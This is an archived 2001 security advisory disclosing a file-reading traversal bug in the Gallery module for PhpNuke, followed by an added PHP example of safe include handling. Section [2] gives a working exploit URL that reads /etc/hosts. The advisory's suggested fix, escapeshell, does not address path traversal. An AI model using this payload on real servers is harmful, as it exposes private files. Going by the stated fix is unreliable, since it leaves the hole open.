Gallery Addon for PhpNuke remote file viewing vulnerability

From: Cabezon Aurélien (aurelien.cabezonat_private)
Date: Sat Nov 17 2001 - 18:18:26 PST


    Gallery Addon for PhpNuke remote file viewing vulnerability
    
    Problem discovered: 18/10/2001 by Cabezon Aurélien |
    aurelien.cabezonat_private
    
    [1] Description
    
    Gallery is an intuitive web based photo gallery with authenticated users and
    privileged albums.
    Photo management includes automatic thumbnails, resizing, rotation, etc.
    Gallery is available as a Nuke 5.0 module.
    
    Gallery Addon is vulnerable to the ../.. bug that allows remote file reading
    on the web server as whatever user runs the web server.
    
    [2] Exploit
    
    http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../etc/hosts
    
    [3] Fix
    
    Coder has been alerted.
    An easy way to fix such a vulnerability is to use the PHP included "system
    escapeshell" function.
    
    [4] Information about Gallery Addon for PhpNuke
    
    http://www.menalto.com/projects/gallery-nuke/
    Author: bharatat_private
    
    ---
    Cabezon Aurélien
    http://www.iSecureLabs.com
    aurelien.cabezon@iSecureLabs.
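
The request in [2] succeeds because the value of the include parameter reaches the filesystem without being confined to a directory. The following is an added example, not code from the advisory or from Gallery: a containment check for such a parameter, written for current PHP. The function name resolve_include, the base directory and the ".php" suffix are assumptions made for illustration.

```php
<?php
// Added example: confine a user-supplied include name to one directory.
// resolve_include(), $baseDir and the ".php" suffix are hypothetical.

function resolve_include(string $baseDir, string $requested): ?string
{
    // Accept a single file-name component only: no "/", "\", ".", NUL or empty value.
    if (!preg_match('/\A[A-Za-z0-9_-]+\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // realpath() resolves ".." and symlinks and returns false for missing paths.
    $target = realpath($prefix . $requested . '.php');
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Second line of defence: the canonical path must still sit under the base
    // directory (catches a symlink inside the directory that points elsewhere).
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed sample data: a temporary directory holding one includable file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . getmypid();
mkdir($dir);
$sample = $dir . DIRECTORY_SEPARATOR . 'view_album.php';
file_put_contents($sample, "<?php // constructed sample file\n");

$inputs = [
    'view_album',                   // legitimate name
    '../../../../../../etc/hosts',  // value from the request in [2]
    'view_album/../../x',           // traversal hidden behind a valid prefix
    '',                             // empty parameter
];
foreach ($inputs as $name) {
    $resolved = resolve_include($dir, $name);
    printf("%-34s => %s\n", var_export($name, true), $resolved === null ? 'rejected' : 'allowed');
}

unlink($sample);
rmdir($dir);
```

Only the first input resolves to a file; the other three are rejected before any file is opened.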
    



    This archive was generated by hypermail 2b30 : Mon Nov 19 2001 - 13:25:52 PST